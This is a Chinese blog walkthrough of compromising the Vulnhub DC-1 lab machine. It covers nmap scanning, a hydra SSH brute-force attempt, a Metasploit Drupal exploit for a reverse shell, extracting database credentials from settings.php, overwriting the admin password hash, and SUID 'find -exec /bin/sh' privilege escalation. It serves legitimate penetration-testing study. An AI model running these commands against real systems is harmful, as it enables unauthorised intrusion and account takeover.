Vulnhub靶机 DC-1打靶 渗透详细过程

2024-04-22 854 0

Vulnhub靶机:DC-1渗透详细过程

一、将靶机导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-1-1,292/

Vulnhub靶机 DC-1打靶 渗透详细过程插图

二、攻击方式

主机发现

使用arp-scan命令,发现主机也可以使用nmap,均可

Vulnhub靶机 DC-1打靶 渗透详细过程插图1

端口扫描

nmap -p- 192.168.0.106

Vulnhub靶机 DC-1打靶 渗透详细过程插图2

开放了22端口以及80,http端口服务,接下来探针服务信息

nmap -sV -A 192.168.0.106

Vulnhub靶机 DC-1打靶 渗透详细过程插图3

Vulnhub靶机 DC-1打靶 渗透详细过程插图4

由于开放了22端口,我们可以尝试去爆破一下,但是未果。

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.106

Vulnhub靶机 DC-1打靶 渗透详细过程插图5

探针还发现开放了80端口,接下来可以进行访问web界面

web渗透

访问过后得到以下界面,此web服务使用了Drupal CMS魔板

Vulnhub靶机 DC-1打靶 渗透详细过程插图6

信息收集

Vulnhub靶机 DC-1打靶 渗透详细过程插图7

我们回到kali端,开启msf,进行搜索相关的漏洞看有无可利用的,如下:

利用msf反弹shell

search drupal

Vulnhub靶机 DC-1打靶 渗透详细过程插图8

use 1 //尝试使用第一个API这个
set rhosts 192.168.0.106 //靶机ip
set lhosts 0.0.0.0
set lport 4444
exploit

Vulnhub靶机 DC-1打靶 渗透详细过程插图9

成功接收到shell,并为普通www-data权限:

Vulnhub靶机 DC-1打靶 渗透详细过程插图10

当前目录下有flag1.txt,查看一下提示:

Vulnhub靶机 DC-1打靶 渗透详细过程插图11

翻译:每一个好的CMS都需要一个配置文件--你也一样。

数据库信息

根据提示找到他的配置文件,不清楚得网上搜一下,Drupal CMS配置文件在哪即可

Vulnhub靶机 DC-1打靶 渗透详细过程插图12

进入到shell当中,当前所在路径为/var/www,直接进入到配置文件当中即可

cd /var/www/sites/default/
cat settings.php

Vulnhub靶机 DC-1打靶 渗透详细过程插图13

查看配置文件信息settings.php,得到数据库的用户名和密码,连接即可查看数据库内容

Vulnhub靶机 DC-1打靶 渗透详细过程插图14

mysql -u dbuser -p
密码:R0ck3t
或
mysql -u dbuser -pR0ck3t

首先获取一个稳定shell,交互性shell

python -c "import pty;pty.spawn('/bin/bash')"

Vulnhub靶机 DC-1打靶 渗透详细过程插图15

进入数据库当中,查看所有数据库

Vulnhub靶机 DC-1打靶 渗透详细过程插图16

web管理员密码

查看当前的数据库和users数据表,查看users表当中的数据信息,得到管理员用户名和密码,但是密码被加密,此加密是自带的加密方式,需要找到加密脚本,搜索一下

Vulnhub靶机 DC-1打靶 渗透详细过程插图17

先把数据拿出来,放到记事本当中。

搜索发现,加密脚本在scripts当中的passwd-hash.sh

进入到此路径当中,查看一下脚本信息:

发现此脚本为php脚本,由此用php来执行,我们来获取一下自定义新密码,从而更新数据库,修改admin管理员的密码

Vulnhub靶机 DC-1打靶 渗透详细过程插图19

Vulnhub靶机 DC-1打靶 渗透详细过程插图20

php password-hash.sh admin //生成新密码

Vulnhub靶机 DC-1打靶 渗透详细过程插图21

回到数据库,将admin密码更新成我们生成的这个自定义密码hash值即可。

UPDATE drupaldb.users SET password = '自定义生成的密码hash值' WHERE username = 'admin' or username = 'Fred';

Vulnhub靶机 DC-1打靶 渗透详细过程插图22

登录web界面,进入后台即可。

提权

找到flag3.txt,翻译如下

特殊的PERMS将帮助查找(find)密码-但您需要-exec命令来确定如何获得阴影中的内容。

Vulnhub靶机 DC-1打靶 渗透详细过程插图23

发现有find命令提示,查看一下find命令得权限

ls -l $(which find)

发现为root权限,那么利用find提权即可,当然提示当中也有说明,使用-exec参数

Vulnhub靶机 DC-1打靶 渗透详细过程插图24

find /etc/passwd -exec whomai \;

Vulnhub靶机 DC-1打靶 渗透详细过程插图25

获取一个shell,命令如下:

find /etc/passwd -exec "/bin/sh" \;

Vulnhub靶机 DC-1打靶 渗透详细过程插图26

方法二,我们通过msf拿到shell以后,可以直接走提权三部曲

查找系统当中拥有suid权限的命令,有没有可利用的

find / -perm -u=s -type f 2>/dev/null
或
find / -user root -perm -4000 print 2>/dev/null

直接发现了find命令,可直接利用,命令同方法一

Vulnhub靶机 DC-1打靶 渗透详细过程插图27

文章不妥之处,欢迎批评指正!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

电力企业 | 安全建设框架
HTB-Infiltrator:一文带你走进域渗透
JAVA安全 | Classloader:理解与利用一篇就够了
多角度揭秘威胁行为组织CryptoCore复杂的加密货币欺诈活动
网络空间的“边水往事”?针对华语黑产及用户进行攻击的 APT-K-UN3 活动分析
伪装“黑神话悟空修改器”传播木马的活动分析

发布评论